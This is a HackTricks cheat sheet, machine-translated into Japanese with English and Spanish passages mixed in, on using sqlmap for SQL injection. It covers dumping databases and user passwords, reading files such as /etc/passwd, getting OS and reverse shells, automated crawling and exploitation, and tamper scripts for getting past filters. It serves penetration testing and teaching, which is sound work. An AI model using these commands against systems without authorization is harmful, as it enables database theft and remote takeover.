hacktricks/pentesting-web/sql-injection/sqlmap
2023-07-07 23:42:27 +00:00
..
README.md Translated to Japanese 2023-07-07 23:42:27 +00:00
second-order-injection-sqlmap.md Translated to Japanese 2023-07-07 23:42:27 +00:00

SQLMap - チートシート

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

DragonJAR Security Conference es un evento internacional de ciberseguridadは、コロンビアのボゴタで2023年9月7日から8日まで開催される、10年以上の歴史を持つ国際的なサイバーセキュリティイベントです。このイベントは、スペイン語で最新の研究が発表され、世界中のハッカーや研究者を魅了する高度な技術的な内容のイベントです。
以下のリンクで今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく!:

{% embed url="https://www.dragonjarcon.org/" %}

SQLmapの基本的な引数

一般的な引数

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

情報の取得

内部

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DBデータ

The database contains sensitive information that can be valuable to an attacker. This information may include usernames, passwords, email addresses, credit card numbers, and other personally identifiable information (PII). It is important to protect this data from unauthorized access and potential leaks. In the context of a SQL injection attack, an attacker can exploit vulnerabilities in a web application to gain unauthorized access to the database and retrieve or modify its contents.

データベースには、攻撃者にとって価値のある機密情報が含まれています。この情報には、ユーザー名、パスワード、メールアドレス、クレジットカード番号、その他の個人を特定できる情報PIIが含まれる場合があります。このデータを未承認のアクセスや潜在的な漏洩から保護することは重要です。SQLインジェクション攻撃の文脈では、攻撃者はウェブアプリケーションの脆弱性を悪用してデータベースに未承認でアクセスし、その内容を取得または変更することができます。

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

インジェクション箇所

Burp/ZAP キャプチャから

リクエストをキャプチャし、req.txt ファイルを作成します。

sqlmap -r req.txt --current-user

GETリクエストのインジェクション

In this section, we will discuss how to perform SQL injection attacks on GET requests using sqlmap. SQL injection is a common vulnerability that allows an attacker to manipulate the SQL queries executed by a web application.

このセクションでは、sqlmapを使用してGETリクエストに対してSQLインジェクション攻撃を行う方法について説明します。SQLインジェクションは、攻撃者がWebアプリケーションが実行するSQLクエリを操作することができる一般的な脆弱性です。

To perform a SQL injection attack on a GET request, we need to identify the vulnerable parameter in the URL. This parameter is typically a part of the query string and is used to pass user input to the server.

GETリクエストに対してSQLインジェクション攻撃を行うには、URL内の脆弱なパラメータを特定する必要があります。このパラメータは通常、クエリ文字列の一部であり、ユーザーの入力をサーバーに渡すために使用されます。

Once we have identified the vulnerable parameter, we can use sqlmap to automate the process of exploiting the SQL injection vulnerability. Sqlmap is a powerful tool that automates the detection and exploitation of SQL injection flaws.

脆弱なパラメータを特定したら、sqlmapを使用してSQLインジェクションの脆弱性を悪用するプロセスを自動化することができます。Sqlmapは、SQLインジェクションの欠陥の検出と悪用を自動化する強力なツールです。

To perform a basic SQL injection attack on a GET request, we can use the following command:

基本的なSQLインジェクション攻撃をGETリクエストに対して実行するには、次のコマンドを使用します。

sqlmap -u "http://example.com/page.php?id=1" --dbs

This command tells sqlmap to target the URL "http://example.com/page.php?id=1" and enumerate the available databases.

このコマンドは、sqlmapに対してURL "http://example.com/page.php?id=1" を対象にし、利用可能なデータベースを列挙するよう指示します。

Sqlmap will automatically analyze the URL, identify the vulnerable parameter, and attempt to exploit the SQL injection vulnerability by injecting malicious SQL queries.

Sqlmapは自動的にURLを分析し、脆弱なパラメータを特定し、悪意のあるSQLクエリを注入してSQLインジェクションの脆弱性を悪用しようとします。

By using sqlmap, we can easily automate the process of identifying and exploiting SQL injection vulnerabilities in GET requests, saving time and effort during penetration testing.

sqlmapを使用することで、GETリクエストのSQLインジェクションの脆弱性を特定し、悪用するプロセスを簡単に自動化することができます。これにより、ペネトレーションテスト中の時間と労力を節約することができます。

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POSTリクエストのインジェクション

In some cases, the target application may use POST requests to send data to the server. SQL injection can also be performed on these POST requests. SQLMap provides options to test and exploit SQL injection vulnerabilities in POST requests.

いくつかの場合、対象のアプリケーションはデータをサーバーに送信するためにPOSTリクエストを使用する場合があります。これらのPOSTリクエストでもSQLインジェクションを実行することができます。SQLMapはPOSTリクエスト内のSQLインジェクションの脆弱性をテストおよび攻撃するためのオプションを提供しています。

To perform SQL injection on a POST request, you need to provide the target URL, the POST data, and the vulnerable parameter. The POST data can be provided in various formats, such as URL-encoded or JSON. SQLMap supports different formats and can automatically detect and handle them.

POSTリクエストでSQLインジェクションを実行するには、対象のURL、POSTデータ、および脆弱なパラメータを指定する必要があります。POSTデータは、URLエンコードやJSONなど、さまざまな形式で提供することができます。SQLMapはさまざまな形式をサポートし、自動的に検出および処理することができます。

To specify the POST data, you can use the --data option followed by the POST data in the required format. For example:

POSTデータを指定するには、必要な形式でのPOSTデータの後に--dataオプションを使用します。例えば:

sqlmap -u "http://example.com/login" --data "username=admin&password=pass123"

You also need to specify the vulnerable parameter using the --data option. For example, if the vulnerable parameter is username, you can use:

また、--dataオプションを使用して脆弱なパラメータを指定する必要があります。例えば、脆弱なパラメータがusernameの場合、次のように使用できます:

sqlmap -u "http://example.com/login" --data "username=admin&password=pass123" --param="username"

SQLMap will then analyze the POST request and attempt to exploit any SQL injection vulnerabilities in the specified parameter.

その後、SQLMapはPOSTリクエストを分析し、指定されたパラメータ内のSQLインジェクションの脆弱性を攻撃しようとします。

sqlmap -u "http://example.com" --data "username=*&password=*"

ヘッダーとその他のHTTPメソッドにおけるインジェクション

In this section, we will explore how to perform SQL injections in headers and other HTTP methods using SQLMap. SQL injections in headers and other HTTP methods can be used to exploit vulnerabilities in web applications and gain unauthorized access to sensitive information.

このセクションでは、SQLMapを使用してヘッダーやその他のHTTPメソッドでSQLインジェクションを実行する方法について説明します。ヘッダーやその他のHTTPメソッドにおけるSQLインジェクションは、ウェブアプリケーションの脆弱性を悪用し、機密情報への不正アクセスを行うために使用されることがあります。

SQL Injection in Headers

User-Agent Header

The User-Agent header is commonly used by web browsers to identify themselves to web servers. However, this header can also be manipulated to perform SQL injections. SQLMap provides the --headers option to specify custom headers for the HTTP request.

To perform a SQL injection in the User-Agent header, you can use the following command:

sqlmap -u <URL> --headers="User-Agent: <SQL_PAYLOAD>"

Replace <URL> with the target URL and <SQL_PAYLOAD> with the SQL injection payload you want to test.

ヘッダーにおけるSQLインジェクション

User-Agentヘッダー

User-Agentヘッダーは、ウェブブラウザが自身をウェブサーバーに識別するために一般的に使用されます。しかし、このヘッダーはSQLインジェクションを実行するためにも操作することができます。SQLMapは、HTTPリクエストのためのカスタムヘッダーを指定するための--headersオプションを提供しています。

User-AgentヘッダーでSQLインジェクションを実行するには、次のコマンドを使用します

sqlmap -u <URL> --headers="User-Agent: <SQL_PAYLOAD>"

<URL>を対象のURLで置き換え、<SQL_PAYLOAD>をテストしたいSQLインジェクションペイロードで置き換えてください。

Other Headers

In addition to the User-Agent header, there are other headers that can be vulnerable to SQL injections, such as Referer, Cookie, and X-Forwarded-For. You can use the same --headers option to specify these headers and perform SQL injections.

For example, to perform a SQL injection in the Referer header, you can use the following command:

sqlmap -u <URL> --headers="Referer: <SQL_PAYLOAD>"

Replace <URL> with the target URL and <SQL_PAYLOAD> with the SQL injection payload you want to test.

その他のヘッダー

User-Agentヘッダーに加えて、Referer、Cookie、およびX-Forwarded-Forなど、SQLインジェクションの脆弱性がある可能性のある他のヘッダーも存在します。これらのヘッダーを指定し、SQLインジェクションを実行するためには、同じ--headersオプションを使用することができます。

たとえば、RefererヘッダーでSQLインジェクションを実行するには、次のコマンドを使用します

sqlmap -u <URL> --headers="Referer: <SQL_PAYLOAD>"

<URL>を対象のURLで置き換え、<SQL_PAYLOAD>をテストしたいSQLインジェクションペイロードで置き換えてください。

SQL Injection in Other HTTP Methods

In addition to the GET and POST methods, there are other HTTP methods that can be vulnerable to SQL injections, such as PUT, DELETE, and OPTIONS. SQLMap provides the --method option to specify the HTTP method for the request.

To perform a SQL injection in a specific HTTP method, you can use the following command:

sqlmap -u <URL> --method=<HTTP_METHOD> --data="<POST_DATA>"

Replace <URL> with the target URL, <HTTP_METHOD> with the desired HTTP method, and <POST_DATA> with the POST data containing the SQL injection payload.

その他のHTTPメソッドにおけるSQLインジェクション

GETおよびPOSTメソッドに加えて、PUT、DELETE、OPTIONSなど、他のHTTPメソッドもSQLインジェクションの脆弱性がある可能性があります。SQLMapは、リクエストのためのHTTPメソッドを指定するための--methodオプションを提供しています。

特定のHTTPメソッドでSQLインジェクションを実行するには、次のコマンドを使用します

sqlmap -u <URL> --method=<HTTP_METHOD> --data="<POST_DATA>"

<URL>を対象のURLで置き換え、<HTTP_METHOD>を希望するHTTPメソッドで置き換え、<POST_DATA>をSQLインジェクションペイロードを含むPOSTデータで置き換えてください。

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

SQLインジェクションが成功した場合に文字列を示す

When SQL injection is successful, SQLMap will indicate it by displaying a specific string. This string is known as the "injection string" and is used to confirm that the vulnerability has been successfully exploited. By default, SQLMap uses the string "sqlmapidentified" as the injection string. However, you can customize this string by using the --string option followed by the desired string. For example:

$ sqlmap -u http://example.com/index.php?id=1 --string="injected"

In this example, SQLMap will use the string "injected" as the injection string. If the injection is successful, SQLMap will search for this string in the response and confirm the vulnerability.

It is important to note that the injection string should be unique and not present in the normal response of the application. Otherwise, false positives may occur. Additionally, the injection string should not contain any special characters that could interfere with the SQL injection payload.

--string="string_showed_when_TRUE"

Eval

Sqlmapは、各ペイロードを送信する前に、いくつかのPythonワンライナーでペイロードを処理するために-eまたは--evalの使用を許可します。これにより、ペイロードを送信する前に、カスタムな方法でペイロードを簡単かつ高速に処理することができます。次の例では、flask cookie sessionは、送信する前にflaskによって既知の秘密で署名されます。

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

シェル

A shell is a command-line interface that allows users to interact with the operating system. It provides a way to execute commands, run scripts, and manage files and directories. In the context of hacking, a shell can be used to gain unauthorized access to a target system and execute commands remotely. This can be achieved through various techniques, such as exploiting vulnerabilities, using backdoors, or leveraging SQL injection attacks. Once a shell is obtained, the attacker has full control over the target system and can perform malicious activities. It is important for security professionals to understand how shells work in order to defend against them and mitigate the risks they pose.

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

ファイルの読み取り

sqlmapは、SQLインジェクションの脆弱性を検出し、悪用するための強力なツールです。このツールを使用すると、データベースからファイルを読み取ることができます。

以下のコマンドを使用して、sqlmapを使用してファイルを読み取ることができます。

sqlmap -u "http://example.com/vulnerable.php?id=1" --file-read="/var/www/html/config.php"

上記のコマンドでは、http://example.com/vulnerable.php?id=1というURLに対してSQLインジェクションを実行し、/var/www/html/config.phpというファイルを読み取ります。

--file-readオプションを使用することで、sqlmapは指定したパスのファイルを読み取ることができます。このオプションを使用する際には、読み取りたいファイルのパスを正確に指定する必要があります。

ファイルの読み取りに成功すると、sqlmapはファイルの内容を表示します。この情報を利用して、システムに関する重要な情報を取得することができます。ただし、この操作は合法的なテストや許可を得た場合にのみ実行してください。

--file-read=/etc/passwd

SQLmapを使用してウェブサイトをクロールし、自動的にエクスプロイトする

SQLmap is a powerful tool for automating SQL injection attacks. It can be used to crawl a website and automatically exploit any SQL injection vulnerabilities it finds. This can save a lot of time and effort compared to manually testing each parameter for SQL injection.

To crawl a website with SQLmap, you can use the following command:

sqlmap -u <URL> --crawl=<depth>

Replace <URL> with the target website's URL and <depth> with the number of levels deep you want SQLmap to crawl. The tool will automatically discover and test parameters for SQL injection vulnerabilities.

By default, SQLmap will use a technique called "Boolean-based blind" to exploit SQL injection vulnerabilities. This technique involves sending specially crafted SQL queries to the target website and analyzing the responses to determine if the vulnerability exists.

SQLmap also supports other exploitation techniques, such as "Time-based blind" and "Error-based," which can be specified using the --technique option.

It's important to note that SQLmap should only be used on websites that you have permission to test. Unauthorized use of SQLmap or any other hacking tool is illegal and unethical.

Remember to always obtain proper authorization and follow ethical guidelines when conducting penetration testing or any other security assessments.

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

セカンドオーダーインジェクション

Second Order Injectionセカンドオーダーインジェクションは、SQLインジェクションの一種であり、攻撃者が最初のインジェクションポイントを見つけても、実際の攻撃は後続のリクエストまたは操作で行われます。これは、アプリケーションがユーザーの入力を適切に検証・エスケープしている場合に特に有効です。

セカンドオーダーインジェクションは、攻撃者がデータベースに対して悪意のあるクエリを実行するために、アプリケーションがユーザーの入力を保存し、後で使用する場合に発生します。攻撃者は、保存されたデータを操作して、アプリケーションが実行するクエリに悪意のあるコードを挿入します。

セカンドオーダーインジェクションは、アプリケーションがユーザーの入力を適切に検証・エスケープしている場合でも発生する可能性があります。攻撃者は、アプリケーションが保存するデータの形式や構造を理解し、それに基づいて攻撃を計画する必要があります。

セカンドオーダーインジェクションの攻撃は、データベースの情報を漏洩させたり、データの改ざんや削除を行ったりすることができます。また、アプリケーションのセキュリティ上の脆弱性を悪用して、システムに対するアクセス権を取得することも可能です。

セカンドオーダーインジェクションの攻撃を防ぐためには、アプリケーションがユーザーの入力を適切に検証・エスケープすることが重要です。また、データベースへのアクセス権限を最小限に制限し、セキュリティパッチを適用することも重要です。

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

この投稿を読む、sqlmapを使用して単純なおよび複雑なセカンドオーダーインジェクションを実行する方法についての情報です。

DragonJAR Security Conferenceは国際的なサイバーセキュリティイベントで、2023年9月7日から8日までコロンビアのボゴタで開催されます。このイベントは、スペイン語で最新の研究が発表され、世界中のハッカーや研究者を惹きつける高度な技術内容のイベントです。
以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく!:

{% embed url="https://www.dragonjarcon.org/" %}

インジェクションのカスタマイズ

サフィックスの設定

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

プレフィックス


Description

This option allows you to specify a prefix that will be added to all the injection payloads sent by SQLMap. This can be useful in scenarios where you need to bypass certain security filters or add specific SQL syntax to the payloads.


使用法

--prefix=<PREFIX>

sqlmap -u "http://example.com/page.php?id=1" --prefix="1' AND "

この例では、--prefixオプションを使用して、すべてのインジェクションペイロードに1' AND というプレフィックスを追加しています。これにより、SQLMapが送信するすべてのペイロードにこのプレフィックスが適用されます。


python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

ブールインジェクションの検出方法のヘルプ

If you suspect that a web application is vulnerable to SQL injection and you want to confirm it using boolean-based techniques, you can use SQLMap. SQLMap is a powerful tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

もし、ウェブアプリケーションがSQLインジェクションの脆弱性を持っている可能性があり、ブールベースのテクニックを使用して確認したい場合は、SQLMapを使用することができます。SQLMapは、SQLインジェクションの脆弱性を検出し、攻撃するプロセスを自動化する強力なツールです。

To find boolean-based SQL injection vulnerabilities using SQLMap, you can follow these steps:

SQLMapを使用してブールベースのSQLインジェクションの脆弱性を見つけるために、以下の手順に従うことができます。

  1. Identify the target URL or form parameter that you suspect is vulnerable to SQL injection.

    SQLインジェクションの脆弱性がある可能性がある対象のURLまたはフォームパラメータを特定します。

  2. Use SQLMap to perform a GET or POST request to the target URL, injecting a boolean-based payload into the vulnerable parameter.

    SQLMapを使用して、脆弱なパラメータにブールベースのペイロードを注入しながら、対象のURLにGETまたはPOSTリクエストを実行します。

    sqlmap -u "http://example.com/vulnerable.php?id=1" --technique=B --dbms=mysql --level=5 --risk=3
    
  3. SQLMap will automatically analyze the response and determine if the application is vulnerable to boolean-based SQL injection.

    SQLMapは自動的にレスポンスを分析し、アプリケーションがブールベースのSQLインジェクションの脆弱性を持っているかどうかを判断します。

  4. If the application is vulnerable, SQLMap will provide you with options to further exploit the vulnerability, such as extracting data from the database or even executing arbitrary commands on the underlying system.

    アプリケーションが脆弱である場合、SQLMapはデータベースからデータを抽出したり、基礎となるシステムで任意のコマンドを実行したりするなど、脆弱性をさらに攻撃するためのオプションを提供します。

By following these steps, you can effectively use SQLMap to detect and exploit boolean-based SQL injection vulnerabilities in web applications. Remember to always obtain proper authorization before performing any penetration testing activities.

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper改ざん

Pythonで独自の改ざんを作成することができることを覚えておいてください。非常に簡単です。Second Order Injectionのページに改ざんの例があります。

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper 説明
apostrophemask.py アポストロフィ文字をそのUTF-8の全角文字に置き換えます。
apostrophenullencode.py アポストロフィ文字をその不正なダブルユニコードの対応文字に置き換えます。
appendnullbyte.py ペイロードの末尾にエンコードされたNULLバイト文字を追加します。
base64encode.py 指定されたペイロード内のすべての文字をBase64でエンコードします。
between.py 大なり演算子('>')を'NOT BETWEEN 0 AND #'に置き換えます。
bluecoat.py SQLステートメントの後にあるスペース文字を有効なランダムな空白文字に置き換えます。その後、文字'='をLIKE演算子に置き換えます。
chardoubleencode.py 指定されたペイロード内のすべての文字をダブルURLエンコードしますすでにエンコードされているものは処理しません
commalesslimit.py 'LIMIT M, N'のようなインスタンスを'LIMIT N OFFSET M'に置き換えます。
commalessmid.py 'MID(A, B, C)'のようなインスタンスを'MID(A FROM B FOR C)'に置き換えます。
concat2concatws.py 'CONCAT(A, B)'のようなインスタンスを'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'に置き換えます。
charencode.py 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされているものは処理しません
charunicodeencode.py 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされているものは処理しません。"%u0022"。
charunicodeescape.py 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされているものは処理しません。"\u0022"。
equaltolike.py 全ての等号演算子('='をLIKE演算子に置き換えます。
escapequotes.py クォート('と")をスラッシュでエスケープします。
greatest.py 大なり演算子('>')を'GREATEST'に置き換えます。
halfversionedmorekeywords.py 各キーワードの前にバージョン付きのMySQLコメントを追加します。
ifnull2ifisnull.py 'IFNULL(A, B)'のようなインスタンスを'IF(ISNULL(A), B, A)'に置き換えます。
modsecurityversioned.py バージョン付きのコメントでクエリ全体を囲みます。
modsecurityzeroversioned.py ゼロバージョンのコメントでクエリ全体を囲みます。
multiplespaces.py SQLキーワードの周りに複数のスペースを追加します。
nonrecursivereplacement.py 事前定義されたSQLキーワードを置換に適した表現に置き換えます.replace("SELECT", ""))フィルター)。
percentage.py 各文字の前にパーセント記号('%')を追加します。
overlongutf8.py 指定されたペイロード内のすべての文字を変換します(すでにエンコードされているものは処理しません)。
randomcase.py 各キーワードの文字をランダムな大文字と小文字の値に置き換えます。
randomcomments.py SQLキーワードにランダムなコメントを追加します。
securesphere.py 特別に作成された文字列を追加します。
sp_password.py ペイロードの末尾に'sp_password'を追加して、DBMSログからの自動的な曖昧化を行います。
space2comment.py スペース文字(' ')をコメントで置き換えます。
space2dash.py スペース文字(' ')をダッシュコメント('--')に置き換え、その後にランダムな文字列と改行('\n')を追加します。
space2hash.py スペース文字(' ')をポンド記号('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。
space2morehash.py スペース文字(' ')をポンド記号('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。
space2mssqlblank.py スペース文字(' ')を有効な代替文字のセットからのランダムな空白文字に置き換えます。
space2mssqlhash.py スペース文字(' ')をポンド記号('#')に置き換え、その後に改行('\n')を追加します。
space2mysqlblank.py スペース文字(' ')を有効な代替文字のセットからのランダムな空白文字に置き換えます。
space2mysqldash.py スペース文字(' ')をダッシュコメント('--')に置き換え、その後に改行('\n')を追加します。
space2plus.py スペース文字(' ')をプラス('+')に置き換えます。
space2randomblank.py スペース文字(' ')を有効な代替文字のセットからのランダムな空白文字に置き換えます。
symboliclogical.py ANDおよびORの論理演算子をそれらのシンボルに置き換えます&&および||)。
unionalltounion.py UNION ALL SELECTをUNION SELECTに置き換えます。
unmagicquotes.py クォート(')をマルチバイトコンボ%bf%27と一緒にジェネリックコメントで置き換えます動作させるために最後に追加
uppercase.py 各キーワードの文字を大文字の値'INSERT'に置き換えます。
varnish.py HTTPヘッダー'X-originating-IP'を追加します。
versionedkeywords.py 関数でない各キーワードをバージョン付きのMySQLコメントで囲みます。
versionedmorekeywords.py 各キーワードをバージョン付きのMySQLコメントで囲みます。
xforwardedfor.py 偽のHTTPヘッダー'X-Forwarded-For'を追加します。

DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:

{% embed url="https://www.dragonjarcon.org/" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥